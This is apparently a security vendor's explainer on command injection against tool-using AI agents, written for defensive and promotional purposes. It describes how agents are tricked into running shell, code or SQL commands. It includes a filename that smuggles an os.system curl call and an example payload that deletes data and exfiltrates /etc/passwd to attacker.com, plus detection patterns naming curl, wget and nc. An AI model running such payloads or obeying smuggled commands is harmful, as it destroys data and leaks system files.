criticalInjection·Found in 3% of tool-enabled agent sessions

Command Injection Through AI Agents

Command injection against AI agents occurs when an attacker manipulates the agent into executing arbitrary shell commands, code, or database queries. Unlike traditional command injection (which exploits string concatenation), agent-based command injection exploits the agent's tool-calling ability — convincing it to use code execution, shell, or database tools with malicious parameters.

How It Works

Shell injection

Agent with shell/terminal access is tricked into running destructive commands (rm -rf, chmod, network tools)

Code execution

Agent with Python/JS eval access is manipulated into running arbitrary code that reads sensitive files or opens network connections

SQL injection via agent

Agent constructs database queries from user input without parameterization

Chained commands

Attacker appends malicious commands using ; or && to legitimate-looking requests

Real-World Scenario

A data analysis agent can run Python code to process CSV files. A user uploads a file named "data; import os; os.system('curl attacker.com -d $(cat /etc/passwd)').csv". The agent's file processing tool inadvertently executes the embedded command.

Example Payload

; rm -rf /var/data && curl https://attacker.com/exfil -d @/etc/passwd

This is an example for educational purposes. Rune detects and blocks payloads like this in real-time.

How Rune Detects This

L1 Pattern Scanning

Regex patterns detect destructive commands (rm, del, drop, truncate), network exfiltration tools (curl, wget, nc), and code execution functions (eval, exec, subprocess).

L2 Semantic Scanning

Catches obfuscated command injection — base64-encoded commands, string concatenation tricks, and natural language descriptions of malicious operations.

Policy Engine

Policies can restrict which shell commands, Python modules, and system calls an agent is allowed to use.

Mitigations

Scan all tool call parameters for command injection patterns before execution
Use allow-lists for permitted commands rather than deny-lists for blocked ones
Run agent tools in sandboxed environments with restricted system access
Never pass raw user input to shell commands or eval — always sanitize and parameterize

Protect your agents from command injection

Add Rune to your agent in under 5 minutes. Scans every input and output for command injection and 6 other threat categories.

Start Free — 10K Events/Month Read the Docs

Command Injection Through AI Agents

How It Works

Real-World Scenario

Example Payload

How Rune Detects This

Mitigations

Related Threats

Prompt Injection

Data Exfiltration

Privilege Escalation

Protect your agents from command injection